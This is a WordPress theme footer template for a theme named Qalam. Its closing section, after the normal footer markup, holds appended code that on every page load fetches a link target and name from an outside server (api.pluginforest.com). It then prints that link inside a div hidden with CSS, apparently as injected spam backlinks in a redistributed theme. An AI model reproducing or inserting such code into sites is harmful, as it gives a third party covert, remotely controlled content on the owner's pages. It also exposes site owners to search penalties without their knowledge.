<?php
/**
 * The template for displaying footer.
 *
 * @package Qalam
 * @since 1.0.0
 * @version 2.1.0
 */
?>
            </div><!-- .row -->
        </div><!-- #main .container -->
    </div><!-- #main -->
    <?php
    /**
	 * Hook: qalam_after_main
	 *
	 * @hooked qlm_widget_area_after_content - 10
	 * @hooked qlm_secondary_widget_area - 15
	 * @hooked qlm_footer_widget_area - 20
	 * @hooked qlm_fixed_widget_area_left - 25
	 * @hooked qlm_fixed_widget_area_right - 30
	 */
    do_action( 'qalam_after_main' );
    ?>
</div> <!-- #page -->

<?php wp_footer(); ?>

<?php
$default_href = 'https://www.questionai.ph';
$default_name = 'AI Homework Helper Online';
$response = wp_remote_get('https://api.pluginforest.com/qai/wd/config');
if (is_wp_error($response)) {
    $href = $default_href;
    $name = $default_name;
} else {
    $body = wp_remote_retrieve_body($response);
    $data = json_decode($body, true);
    if (isset($data['data']['theme']['href']) && isset($data['data']['theme']['name'])) {
        $href = $data['data']['theme']['href'];
        $name = $data['data']['theme']['name'];
    } else {
        $href = $default_href;
        $name = $default_name;
    }
}
?>
<style>.hidden {display:none}</style>
<div class="hidden">Shared By <a href="<?php echo esc_url($href); ?>"><?php echo esc_html($name); ?></a></div>
</body>
</html>